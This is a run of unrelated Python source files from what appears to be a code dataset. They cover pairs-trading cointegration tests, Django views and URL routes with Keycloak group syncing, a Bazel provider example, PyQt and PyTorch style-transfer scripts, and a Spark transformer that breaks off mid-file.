self.adf_confidence_level: AdfPrecisions = adf_confidence_level\n self.max_mean_rev_time: int = max_mean_rev_time\n self.entry_z: float = entry_z\n self.exit_z: float = exit_z\n self.current_window: current_window = current_window\n self.previous_window: Window = previous_window\n\n def generate_pairs(self,\n clustering_results: Dict[int, Tuple[Tuple[Tickers]]],\n hurst_exp_threshold: float):\n # run cointegration_analysis on all poss combinations of pairs\n\n cointegrated_pairs = []\n prev_time = time.time()\n n_tested = 0\n n_cointegrated = 0\n\n x = {0: ((SnpTickers.MSFT, SnpTickers.TAP), (SnpTickers.MSFT, SnpTickers.AAPL)),\n 1: ((SnpTickers.DAL, SnpTickers.AAPL), (SnpTickers.FANG, SnpTickers.APA))}\n\n\n list_of_lists = [i for i in clustering_results.values()]\n\n flattened = [pair for x in list_of_lists for pair in x]\n\n sorted_cluster_results = sorted(flattened, key=lambda x: x[0].value)\n\n # sorted_cluster_results = [(SnpTickers.A, SnpTickers.SCHW)]\n\n\n for pair in sorted_cluster_results:\n if n_tested % 100 == 0:\n print(f'Currently checking cointegration for {[i.name for i in pair]}. '\n f'Checked {n_tested}. Number cointegrated {n_cointegrated}. '\n f'Time elapsed (s): {(time.time() - prev_time):.4f}')\n\n t1 = self.current_window.get_data(universe=Universes.SNP,\n tickers=[pair[0]],\n features=[Features.CLOSE])\n t2 = self.current_window.get_data(universe=Universes.SNP,\n tickers=[pair[1]],\n features=[Features.CLOSE])\n\n residuals, beta = self.__logged_lin_reg(t1, t2)\n\n adf_test_statistic, adf_critical_values = self.__adf(residuals)\n hl_test = self.__hl(residuals)\n he_test = self.__hurst_exponent_test(residuals)\n\n is_cointegrated = self.__acceptance_rule(adf_test_statistic, adf_critical_values,\n self.adf_confidence_level, hl_test, self.max_mean_rev_time,\n he_test, hurst_exp_threshold)\n\n if is_cointegrated:\n n_cointegrated += 1\n r_x = self.__log_returner(t1)\n mu_x_ann = float(250 * np.mean(r_x))\n sigma_x_ann = float(250 ** 0.5 * np.std(r_x))\n ou_mean, ou_std, ou_diffusion_v, recent_dev, recent_dev_scaled = self.__ou_params(residuals)\n\n scaled_beta = beta / (beta - 1)\n cointegrated_pairs.append(CointegratedPair(pair, mu_x_ann, sigma_x_ann, scaled_beta, hl_test,\n ou_mean, ou_std, ou_diffusion_v,\n recent_dev, recent_dev_scaled))\n\n print(f\"{[i.name for i in pair]} are cointegrated. \"\n f\"ADF test stat: {adf_test_statistic:.4f} \"\n f\"Critical value @ {adf_critical_values[self.adf_confidence_level.value]:.4f} \"\n f\"Beta: {beta,scaled_beta}\")\n\n if n_cointegrated == 3:\n return cointegrated_pairs\n\n n_tested += 1\n\n return cointegrated_pairs\n\n def __logged_lin_reg(self, x: DataFrame, y: DataFrame) -> Tuple[array, float]:\n\n log_x = x.applymap(lambda k: np.log(k))\n log_y = y.applymap(lambda k: np.log(k))\n\n results = LinearRegression(fit_intercept=False).fit(log_x, log_y)\n residuals = log_y - results.predict(log_x) # e = y - y^\n beta = float(results.coef_[0])\n\n return np.array(residuals), beta\n\n def __log_returner(self, x: DataFrame) -> array:\n x = np.array(x)\n r_x = np.log(x[1:]) - np.log(x[:-1])\n return r_x\n\n def __adf(self, residuals: array):\n '''\n critical values are in the following dictionary form:\n {'1%': -3.4304385694773387,\n '5%': -2.8615791461685034,\n '10%': -2.566790836162312}\n '''\n\n adf_results = adfuller(residuals)\n adf_test_statistic: float = adf_results[0]\n adf_critical_values: Dict[str, float] = adf_results[4]\n\n return adf_test_statistic, adf_critical_values\n\n def __hurst_exponent_test(self, residuals) -> float:\n\n # lag vector\n tau_vector = []\n\n # var[ (1 - L^n)y ]\n variance_delta_vector = []\n\n max_lags = int(self.current_window.window_length.days * 0.5)\n\n for lag in range(2, max_lags):\n # (1 - L^n)y\n delta_res = residuals[lag:] - residuals[:-lag]\n\n tau_vector.append(lag)\n\n variance_delta_vector.append(\n np.var(delta_res)\n )\n\n # avoid 0 values for variance_delta_vector\n variance_delta_vector = [value if value != 0 else 1e-10 for value in variance_delta_vector]\n\n residuals, beta = self.__logged_lin_reg(DataFrame(tau_vector), DataFrame(variance_delta_vector))\n\n # https://quant.stackexchange.com/questions/35513/explanation-of-standard-method-generalized-hurst-exponent\n\n return beta / 2\n\n def __hl(self, residuals: array) -> float:\n\n # independent variable\n lagged_residuals = residuals[:-1]\n # dependent variable\n delta_residuals = (residuals[1:] - lagged_residuals)\n model = LinearRegression().fit(lagged_residuals, delta_residuals)\n pi = float(model.coef_[0]) # pi = -k * dt\n # calculate average time of mean reversion from average speed of mean reversion as per formula\n hl_ave_mean_rev_time = np.log(2) / (-pi) # measured in days\n return hl_ave_mean_rev_time\n\n def __ou_params(self, residuals: array) -> Tuple[float, float, float, float, float]:\n # We assume the residuals of a cointegrated pair is an OU process\n\n # independent variable\n lagged_residuals = residuals[:-1]\n # dependent variable\n residuals = residuals[1:]\n model = LinearRegression().fit(lagged_residuals, residuals)\n errors = residuals - model.predict(lagged_residuals)\n ou_mean = float(np.mean(residuals))\n ou_std = float(np.std(residuals))\n sigma_errors = float(np.std(errors))\n ou_diffusion_v = 250 ** 0.5 * sigma_errors\n\n recent_dev = float(residuals[-1])\n recent_dev_scaled = (recent_dev - ou_mean) / ou_std\n\n return ou_mean, ou_std, ou_diffusion_v, recent_dev, recent_dev_scaled\n\n def __acceptance_rule(self, adf_test_statistic: float, adf_critical_values: Dict[str, float],\n adf_confidence_level: AdfPrecisions, hl_test: float, max_mean_rev_time: int, he_test: float,\n hurst_exp_threshold: float):\n\n adf = adf_test_statistic < adf_critical_values[adf_confidence_level.value]\n hl = hl_test < max_mean_rev_time\n he = he_test < hurst_exp_threshold\n\n return all([adf, hl, he])\n","sub_path":"src/Cointegrator.py","file_name":"Cointegrator.py","file_ext":"py","file_size_in_byte":8999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335423213","text":"from django.conf.urls import url\nfrom . import views\nfrom django.contrib.auth.views import login, logout\nfrom blogapp.views import WritePostView, WriteEmailView\n\napp_name='blogapp'\nurlpatterns = [\n url(r'^$', WriteEmailView.as_view(), name='index'),\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n url(r'^writepost/', WritePostView.as_view(), name='writepost'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^login/$', login, {'template_name' : 'blogapp/login.html'}),\n url(r'^logout/$', logout, {'template_name' : 'blogapp/logout.html'}),\n url(r'^register/$', views.register, name='register'),\n url(r'^profile/$', views.profile, name='profile'),\n url(r'^thanks/$', views.thanks, name='thanks'),\n url(r'^wrong-register/$', views.wrong_register, name='wrong_register'),\n url(r'^wrong-post/$', views.wrong_post, name='wrong_post'),\n url(r'^wrong-email/$', views.wrong_email, name='wrong_email'),\n url(r'^VadimPetrov/$', views.vadimpetrov, name='vadimpetrov'),\n url(r'^profile/edit/$', views.profile_edit, name='profile_edit'),\n url(r'^profile/change-password/$', views.change_password, name='change_password'),\n\n]","sub_path":"blogapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384803469","text":"\"\"\"\nThis is a example on using provider to pass around information between different\nrules. To check the result:\n1. bazel build //main:msg\n2. Check the message from output msg.o, and you will see messages\n from three dependencies cat together.\n\n\"\"\"\n\n# Create a msg struct\nmsg = provider(\"message\")\n\ndef _impl(ctx):\n result = \"\"\n\n # Iterate through dependents and cat messages\n for dep in ctx.attr.deps:\n result += dep[msg].message\n ctx.actions.write(output = ctx.outputs.out, content = str(result))\n\n # Return the provider with result, visible to other rules.\n return [msg(message = result)]\n\ndef _dep_impl(ctx):\n # As a dependent, returns a struct with field message set to attr.message\n # If you don't set and return this, will get error mandatory provider\n # not provided\n return [msg(message = ctx.attr.message)]\n\nmsg_rule2 = rule(\n implementation = _dep_impl,\n attrs = {\n \"message\": attr.string(default = \"\"),\n },\n)\n\nmsg_rule = rule(\n implementation = _impl,\n attrs = {\n # \"message\": attr.string(default = \"\"),\n \"deps\": attr.label_list(providers = [msg]),\n },\n outputs = {\"out\": \"%{name}.o\"},\n)\n\n","sub_path":"Bazel_Prep/cpp-tutorial/stage3/main/providers.bzl","file_name":"providers.bzl","file_ext":"bzl","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418297093","text":"#########################################################################\n#\n# Copyright 2018, GeoSolutions Sas.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree.\n#\n#########################################################################\n\nfrom typing import List\nimport logging\n\nfrom django.conf import settings\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.contrib import messages\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import redirect\nfrom django.urls import reverse_lazy\nfrom django.urls import reverse\nfrom django.utils import translation\nfrom django.utils.translation import gettext as _\nfrom django.views.generic import CreateView\nfrom django.views.generic import DetailView\nfrom django.views.generic import UpdateView\n\nfrom base import mixins\nfrom base import utils\nfrom keycloakauth import oidchooks\nfrom keycloakauth.keycloakadmin import get_manager as get_keycloak_manager\nfrom . import forms\nfrom . import models\nfrom .rules import has_profile\n\nlogger = logging.getLogger(__name__)\n\n\ndef activate_language(language_code, request):\n logger.debug(\"activate_language called\")\n translation.activate(language_code)\n request.session[translation.LANGUAGE_SESSION_KEY] = language_code\n\n\ndef update_user_groups(user: models.SmbUser, user_profile: str,\n current_keycloak_groups: List[str]):\n \"\"\"Update a user's groups based on the requested user profile\n\n The workflow is:\n\n - user asks Keycloak to become a member of the group(s) corresponding\n to its profile\n - Keycloak either accepts and creates the memberships or denies and\n notifies an admin that user wants to be given membership of said groups\n - if Keycloak created the relevant memberships, we update the user's\n django groups\n\n Note:\n\n We do not use permissions here because we want Keycloak to be the\n authority on the user group memberships. In order to do that we can only\n update a django user's django group when we are certain that Keycloak\n already has reflected that membership in its own user database\n\n \"\"\"\n\n keycloak_groups = enforce_keycloak_group_memberships(\n user.keycloak.UID,\n user_profile,\n current_keycloak_groups\n )\n oidchooks.create_django_memberships(user, keycloak_groups)\n\n\ndef enforce_keycloak_group_memberships(user_id: str, user_profile: str,\n current_groups: List[str]):\n \"\"\"Assign user memberships on the relevant KeyCloak groups, if allowed.\n\n The registration of some user profiles, like `end_user`, is automatically\n accepted, resulting in the relevant KeyCloak groups needing to be updated\n with new members. Other profile types are not allowed to self register as\n group members on KeyCloak.\n\n \"\"\"\n\n memberships_to_enforce = settings.KEYCLOAK[\"group_mappings\"][user_profile]\n if set(current_groups) == set(memberships_to_enforce):\n result = current_groups\n else:\n keycloak_manager = get_keycloak_manager(\n base_url=settings.KEYCLOAK[\"base_url\"],\n realm=settings.KEYCLOAK[\"realm\"],\n client_id=settings.KEYCLOAK[\"client_id\"],\n username=settings.KEYCLOAK[\"admin_username\"],\n password=settings.KEYCLOAK[\"admin_password\"],\n )\n if user_profile == settings.END_USER_PROFILE:\n missing_memberships = set(\n memberships_to_enforce) - set(current_groups)\n if any(missing_memberships):\n for group_path in missing_memberships:\n keycloak_manager.add_user_to_group(user_id, group_path)\n result = memberships_to_enforce\n else:\n keycloak_manager.set_user_access(user_id, enabled=False)\n raise RuntimeError(\"profiles of type {!r} must be manually \"\n \"approved by an admin\".format(user_profile))\n return result\n\n\nclass UserProfileMixin(object):\n\n def get_object(self, queryset=None):\n user = self.request.user\n return user.profile if has_profile(user) else False\n\n\nclass PrivilegedUserProfileCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n model = models.PrivilegedUserProfile\n template_name_suffix = \"_create\"\n success_url = settings.LOGOUT_URL\n permission_required = \"profiles.can_create_profile\"\n fields = ()\n admin_email_subject_template_name = (\n \"profiles/mail/privilegeduser_registration_request_subject.txt\")\n admin_email_message_template_name = (\n \"profiles/mail/privilegeduser_registration_request_message.txt\")\n\n @property\n def success_message(self):\n return _(\"Privileged user profile created!\")\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n elif has_profile(self.request.user):\n raise PermissionDenied(\"User already has a profile\")\n\n def get_context_data(self, **kwargs):\n context_data = super().get_context_data(**kwargs)\n context_data[\"user_form\"] = self._get_user_form()\n return context_data\n\n def form_valid(self, form):\n \"\"\"Assign the request's user to the form and perform profile moderation\n\n This method relies on the presence of a ``groups`` key on the id token.\n\n \"\"\"\n\n form.instance.user = self.request.user\n user_form = self._get_user_form()\n if user_form.is_valid():\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n super().form_valid(form)\n id_token = self.request.session.get(\"id_token\")\n try:\n update_user_groups(\n user=self.request.user,\n user_profile=settings.PRIVILEGED_USER_PROFILE,\n current_keycloak_groups=id_token.get(\"groups\", [])\n )\n result = redirect(\"home\")\n except RuntimeError:\n messages.info(\n self.request, _(\"Registration request sent to admins\"))\n messages.info(self.request, _(\"You have been logged out\"))\n utils.send_email_to_admins(\n self.admin_email_subject_template_name,\n self.admin_email_message_template_name,\n context={\n \"username\": self.request.user.username,\n \"email\": self.request.user.email,\n \"keycloak_base_url\": settings.KEYCLOAK[\"base_url\"],\n \"site_name\": get_current_site(self.request),\n }\n )\n result = redirect(settings.LOGOUT_URL)\n else:\n result = self.form_invalid(form)\n return result\n\n def form_invalid(self, form):\n user_form = self._get_user_form()\n return self.render_to_response(\n self.get_context_data(form=form, user_form=user_form))\n\n def _get_user_form(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return forms.SmbUserForm(data=data, instance=self.request.user)\n\n\nclass EndUserProfileCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n \"\"\"Profile completion view\n\n This view uses two forms, one for the completion of the user profile and\n another for the mobility habits survey.\n\n \"\"\"\n\n model = models.EndUserProfile\n form_class = forms.EndUserProfileForm\n template_name_suffix = \"_create\"\n permission_required = \"profiles.can_create_profile\"\n success_url = reverse_lazy(\"profile:update\")\n\n @property\n def success_message(self):\n return _(\"User profile created. You can now add some bikes\")\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n elif has_profile(self.request.user):\n raise PermissionDenied(\"User already has a profile\")\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context.update(self._get_extra_forms())\n return context\n\n def form_valid(self, form):\n \"\"\"Assign the request's user to the form and perform profile moderation\n\n This method relies on the presence of a ``groups`` key on the id token.\n This key is used in order to sync group memberships with keycloak.\n\n \"\"\"\n\n form.instance.user = self.request.user\n # validate extra forms before saving anything\n extra_forms = self._get_extra_forms()\n if all([f.is_valid() for f in extra_forms.values()]):\n super().form_valid(form)\n # upon calling super().form_valid(form) the property self.object\n # points to the newly created enduser profile\n mobility_form = extra_forms[\"mobility_form\"]\n mobility_form.instance.end_user = self.object\n mobility_form.save()\n user_form = extra_forms[\"user_form\"]\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n response = redirect(self.get_success_url())\n id_token = self.request.session.get(\"id_token\")\n update_user_groups(\n user=self.request.user,\n user_profile=settings.END_USER_PROFILE,\n current_keycloak_groups=id_token.get(\"groups\", [])\n )\n else:\n response = self.form_invalid(form)\n logger.debug(\"response: {}\".format(response))\n return response\n\n def form_invalid(self, form):\n extra_forms = self._get_extra_forms()\n return self.render_to_response(\n self.get_context_data(form=form, **extra_forms))\n\n def _get_extra_forms(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return {\n \"user_form\": forms.SmbUserForm(data=data,\n instance=self.request.user),\n \"mobility_form\": forms.UserMobilityHabitsForm(data=data)\n }\n\n\nclass ProfileUpdateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n mixins.UserHasObjectPermissionMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n UpdateView):\n permission_required = \"profiles.can_edit_profile\"\n\n @property\n def success_message(self):\n return _(\"User profile updated!\")\n\n def has_permission(self):\n user = self.request.user\n for perm in self.get_permission_required():\n if not user.has_perm(perm, obj=user.profile):\n result = False\n break\n else:\n result = True\n return result\n\n def get_template_names(self):\n profile_class = type(self.request.user.profile)\n template_name = {\n models.EndUserProfile: \"profiles/enduserprofile_update.html\",\n models.PrivilegedUserProfile: (\n \"profiles/privilegeduserprofile_update.html\"),\n }.get(profile_class)\n return [template_name]\n\n def get_queryset(self):\n profile_class = type(self.request.user.profile)\n return profile_class.objects.get(pk=self.request.user.profile.pk)\n\n def get_form_class(self):\n profile_class = type(self.request.user.profile)\n return {\n models.EndUserProfile: forms.EndUserProfileForm,\n models.PrivilegedUserProfile: forms.PrivilegedUserProfileForm,\n }.get(profile_class)\n\n def get_context_data(self, **kwargs):\n context_data = super().get_context_data(**kwargs)\n context_data[\"user_form\"] = self._get_user_form()\n return context_data\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n result = settings.LOGIN_URL\n else:\n messages.info(\n self.request,\n _(\"Please complete your user profile before continuing\")\n )\n result = reverse(\"profile:create\")\n return result\n\n def form_valid(self, form):\n \"\"\"Process uploaded form data after the form has been validated\n\n Reimplemented in order to also perform validation on the other form,\n for the SmbUser model, and handle all uploaded data.\n\n \"\"\"\n\n form.instance.user = self.request.user\n user_form = self._get_user_form()\n if user_form.is_valid():\n user = user_form.save()\n activate_language(user.language_preference, self.request)\n response = super().form_valid(form)\n else:\n response = self.form_invalid(form)\n return response\n\n def form_invalid(self, form):\n user_form = self._get_user_form()\n return self.render_to_response(\n self.get_context_data(form=form, user_form=user_form))\n\n def _get_user_form(self):\n data = self.request.POST if self.request.method == \"POST\" else None\n return forms.SmbUserForm(data=data, instance=self.request.user)\n\n\nclass MobilityHabitsSurveyCreateView(LoginRequiredMixin,\n PermissionRequiredMixin,\n UserProfileMixin,\n mixins.FormUpdatedMessageMixin,\n CreateView):\n model = models.MobilityHabitsSurvey\n context_object_name = \"survey\"\n form_class = forms.UserMobilityHabitsForm\n template_name_suffix = \"_create\"\n success_url = reverse_lazy(\"profile:update\")\n permission_required = \"profiles.can_edit_profile\"\n\n def has_permission(self):\n user = self.request.user\n for perm in self.get_permission_required():\n if not user.has_perm(perm, obj=user.profile):\n result = False\n break\n else:\n result = True\n return result\n\n def get_login_url(self):\n if not self.request.user.is_authenticated:\n return settings.LOGIN_URL\n else:\n raise PermissionDenied()\n\n def form_valid(self, form):\n form.instance.end_user = self.request.user.profile\n return super().form_valid(form)\n\n\nclass MobilityHabitsSurveyDetailView(LoginRequiredMixin,\n PermissionRequiredMixin,\n mixins.AjaxTemplateMixin,\n DetailView):\n model = models.MobilityHabitsSurvey\n context_object_name = \"survey\"\n permission_required = \"profiles.can_view_profile\"\n ajax_template_name = \"profiles/mobilityhabitssurvey_detail_inner.html\"\n","sub_path":"smbportal/profiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23483333","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Creare un modulo test_counters_input che esegue un codice del tutto simile a quello di test_counters_exceptions,\nma accetti in input da linea di comando i tre valori al posto di generarli in maniera automatica\n(consultare la documentazione online della libreria argparse).\n->'-i' indichi il valore di inizializzazione del contatore,\n-> '-a' il numero di incrementi del contatore da eseguire,\n->'-d' il numero di decrementi da eseguire.\"\"\"\n\n# importo la libreria per il parsing dei parametri dello script\nimport argparse\n\nfrom test_counters_exceptions import test_counters_exceptions\n\n\ndef get_parser():\n \"\"\"\n Crea e restituisce un parser che accetta i tre parametri obbligatori\n -i, -a e -d\n \"\"\"\n p = argparse.ArgumentParser(\n description=\"Test di contatore con gestione delle eccezioni\")\n p.add_argument('-i', dest='inizio', type=int, required=True,\n help='Valore iniziale del contatore')\n p.add_argument('-a', dest='inc', type=int, required=True,\n help='Numero di incrementi')\n p.add_argument('-d', dest='dec', type=int, required=True,\n help='Numero di decrementi')\n return p\n\nif __name__ == \"__main__\":\n parser = get_parser()\n args = parser.parse_args()\n\n # per provare con una serie nota di parametri, ad esempio da ipython\n # args = parser.parse_args('-i 3 -a 4 -d 5'.split())\n lista = []\n\n lista.append(args.inizio)\n lista.append(args.inc)\n lista.append(args.dec)\n s = \"Script invocato con parametri:\\n\\t Inizio: {}\\n\\t \"\n s += \"Numero incrementi: {}\\n\\t Numero decrementi: {}\"\n\n print(s.format(lista[0], lista[1], lista[2]))\n\n test_counters_exceptions(lista)","sub_path":"Phyton01/test_counters_input.py","file_name":"test_counters_input.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"48694035","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nimport sys\n\nclass MyWindow(QMainWindow):\n\tdef __init__(self):\n\t\tsuper(MyWindow, self).__init__()\n\t\tself.setGeometry(200, 200, 300, 300)\n\t\tself.setWindowTitle(\"Zeus\")\n\t\tself.initUI()\n\t\n\tdef initUI(self):\n\t\tself.label = QtWidgets.QLabel(self)\n\t\tself.label.setText(\"Test Label\")\n\t\tself.label.move(50,50)\n\n\t\tself.b1 = QtWidgets.QPushButton(self)\n\t\tself.b1.setText(\"Click Me\")\n\t\tself.b1.clicked.connect(self.b1_clicked)\n\n\tdef b1_clicked(self):\n\t\tself.label.setText(\"pressed\")\n\t\tself.update()\n\n\tdef update(self):\n\t\tself.label.setStyleSheet(\"border: 1px solid black;\")\n\t\tself.label.adjustSize()\n\ndef window():\n\tapp = QApplication(sys.argv)\n\twin = MyWindow()\n\twin.show()\n\tsys.exit(app.exec_())\n\nwindow()","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645707709","text":"from django.shortcuts import render, redirect\nfrom .models import Todo\nfrom django.views.decorators.http import require_POST\nfrom .forms import MyForm\n#from django.http import HttpResponse\n# Create your views here.\n\ndef index(request):\n form = MyForm()\n todo_list = Todo.objects.order_by('id')\n context = {\n 'todo_list': todo_list,\n 'form': form\n }\n return render(request, 'todo/index.html', context)\n\ndef complete(request, id):\n done = Todo.objects.get(pk=id)\n done.completed = True\n done.save()\n return redirect('todo:index')\n\n@require_POST\ndef add(request):\n print(request.POST)\n myform = MyForm(request.POST)\n if myform.is_valid():\n new_todo = Todo(text=myform.cleaned_data['text'])\n new_todo.save()\n return redirect('todo:index')\n\ndef deleteComplete(request):\n Todo.objects.filter(completed__exact=True).delete()\n print('delete completed')\n return redirect('todo:index')\n\ndef deleteAll(request):\n Todo.objects.all().delete()\n return redirect('todo:index')\n","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377508841","text":"import copy\n\nimport torch as T\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nimport torchvision.transforms as transforms\nimport torchvision.models as models\n\nfrom PIL import Image\n\nfrom content_loss import ContentLoss\nfrom style_loss import StyleLoss\nfrom gram_matrix import GramMatrix\n\nIMG_SIZE = 256\nIMG_HEIGHT = IMG_SIZE\nIMG_WIDTH = IMG_SIZE\n\nUSE_CUDA = T.cuda.is_available()\ndtype = T.cuda.FloatTensor if USE_CUDA else T.FloatTensor\n\nloader = transforms.Compose([\n transforms.Scale(IMG_SIZE), # scale imported image\n transforms.ToTensor()]) # transform it into a torch tensor\n\ndef image_loader(image_fname):\n image = Image.open(image_fname)\n image = Variable(loader(image))\n # fake batch dimension required to fit network's input dimensions\n image = image.unsqueeze(0)\n return image\n\nstyle_img = image_loader('style.jpg')\ninput_img = image_loader('input.jpg')\n\ncnn = models.vgg19(pretrained=True).features\n\n# move it to the GPU if possible:\nif USE_CUDA:\n cnn = cnn.cuda()\n\ncontent_layers_default = ['conv_4']\nstyle_layers_default = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']\n\ndef get_style_model_and_losses(cnn, style_img, content_img,\n style_weight=1000, content_weight=1,\n content_layers=content_layers_default,\n style_layers=style_layers_default, use_cuda=USE_CUDA):\n cnn = copy.deepcopy(cnn)\n\n # just in order to have an iterable access to or list of content/syle\n # losses\n content_losses = []\n style_losses = []\n\n model = nn.Sequential() # the new Sequential module network\n gram = GramMatrix() # we need a gram module in order to compute style targets\n\n # move these modules to the GPU if possible:\n if use_cuda:\n model = model.cuda()\n gram = gram.cuda()\n\n i = 1\n for layer in list(cnn):\n if isinstance(layer, nn.Conv2d):\n name = \"conv_\" + str(i)\n model.add_module(name, layer)\n\n if name in content_layers:\n # add content loss:\n target = model(content_img).clone()\n content_loss = ContentLoss(target, content_weight)\n model.add_module(\"content_loss_\" + str(i), content_loss)\n content_losses.append(content_loss)\n\n if name in style_layers:\n # add style loss:\n target_feature = model(style_img).clone()\n target_feature_gram = gram(target_feature)\n style_loss = StyleLoss(target_feature_gram, style_weight)\n model.add_module(\"style_loss_\" + str(i), style_loss)\n style_losses.append(style_loss)\n\n if isinstance(layer, nn.ReLU):\n name = \"relu_\" + str(i)\n model.add_module(name, layer)\n\n if name in content_layers:\n # add content loss:\n target = model(content_img).clone()\n content_loss = ContentLoss(target, content_weight)\n model.add_module(\"content_loss_\" + str(i), content_loss)\n content_losses.append(content_loss)\n\n if name in style_layers:\n # add style loss:\n target_feature = model(style_img).clone()\n target_feature_gram = gram(target_feature)\n style_loss = StyleLoss(target_feature_gram, style_weight)\n model.add_module(\"style_loss_\" + str(i), style_loss)\n style_losses.append(style_loss)\n\n i += 1\n\n if isinstance(layer, nn.MaxPool2d):\n name = \"pool_\" + str(i)\n model.add_module(name, layer) # ***\n\n return model, style_losses, content_losses\n\ndef get_input_param_optimizer(input_img):\n # this line to show that input is a parameter that requires a gradient\n input_param = nn.Parameter(input_img.data)\n optimizer = optim.LBFGS([input_param])\n return input_param, optimizer\n\ndef run_style_transfer(cnn, content_img, style_img, input_img, num_steps=10,\n style_weight=1000, content_weight=1):\n \"\"\"Run the style transfer.\"\"\"\n print('Building the style transfer model..')\n model, style_losses, content_losses = get_style_model_and_losses(cnn,\n style_img, content_img, style_weight, content_weight)\n input_param, optimizer = get_input_param_optimizer(input_img)\n\n print('Optimizing..')\n run = [0]\n while run[0] <= num_steps:\n\n def closure():\n # correct the values of updated input image\n input_param.data.clamp_(0, 1)\n\n optimizer.zero_grad()\n model(input_param)\n style_score = 0\n content_score = 0\n\n for sl in style_losses:\n style_score += sl.backward()\n for cl in content_losses:\n content_score += cl.backward()\n\n run[0] += 1\n if run[0] % 2 == 0:\n print(\"run {}:\".format(run))\n print('Style Loss : {:4f} Content Loss: {:4f}'.format(\n style_score.data[0], content_score.data[0]))\n print()\n\n return style_score + style_score\n\n optimizer.step(closure)\n\n # a last correction...\n input_param.data.clamp_(0, 1)\n\n return input_param.data\ninit_img = Variable(T.randn(input_img.data.size())).type(dtype)\noutput = run_style_transfer(cnn, input_img, style_img, init_img)\n\n\nimport ipdb;ipdb.set_trace()\n","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"583733898","text":"from pyspark.sql import Row\nfrom py4j.java_gateway import JavaGateway\nfrom py4j.java_gateway import GatewayParameters\n\nclass Transformer(object):\n\n def new_dataframe_row(self, old_row, column_name, column_value):\n row = Row(*(old_row.__fields__ + [column_name]))(*(old_row + (column_value,)))\n\n return row\n\n def transform(self, dataframe):\n raise NotImplementedError\n\nclass OntologyTransformer(Transformer):\n\n def __init__(self, java_gateway_address, java_gateway_port, num_classes, probability_vector_col=\"prediction\",\n correct_activity_col=\"label_index\", context_col=\"context\", output_col=\"refined_index\"):\n self.probability_vector_col = probability_vector_col\n self.correct_activity_col = correct_activity_col\n self.output_column = output_col\n self.context_col = context_col\n self.java_gateway_address = java_gateway_address\n self.java_gateway_port = java_gateway_port\n self.num_classes = num_classes\n\n def transform(self, dataframe):\n return dataframe.rdd.mapPartitions(self.partition_transform).toDF()\n\n def partition_transform(self,iterator):\n parameters = GatewayParameters(address=self.java_gateway_address, port=self.java_gateway_port,\n auto_convert=True)\n gateway = JavaGateway(gateway_parameters=parameters)\n entry_point = gateway.entry_point\n new_iterator = []\n for item in iterator:\n new_item = self._transform(item, entry_point)\n new_iterator.append(new_item)\n gateway.close()\n new_iterator = iter(new_iterator)\n return new_iterator\n\n\n def get_index(self, vector):\n max = 0.0\n max_index = 0\n for index in range(0, self.num_classes):\n if vector[index] > max:\n max = vector[index]\n max_index = index\n\n return max_index\n\n def _transform(self, row, entry_point):\n prediction = row[self.probability_vector_col].toArray() #numpy array\n context = row[self.context_col]\n correct_activity = row[self.correct_activity_col]\n correct_activity = int(correct_activity)\n index = 0.0\n if context == \"Null\":\n index = float(self.get_index(prediction))\n else:\n index = entry_point.refinePrediction(prediction.tolist(), correct_activity, context)\n index = float(index)\n new_row = self.new_dataframe_row(row, self.output_column, index)\n\n return new_row\n\n\nclass LabelIndexTransformer(Transformer):\n\n def __init__(self, output_dim, input_col=\"prediction\", output_col=\"prediction_index\",\n default_index=0, activation_threshold=0.55):\n self.input_column = input_col\n self.output_column = output_col\n self.output_dimensionality = output_dim\n self.activation_threshold = activation_threshold\n self.default_index = default_index\n\n def get_index(self, vector):\n max = 0.0\n max_index = self.default_index\n for index in range(0, self.output_dimensionality):\n if vector[index] >= self.activation_threshold:\n return 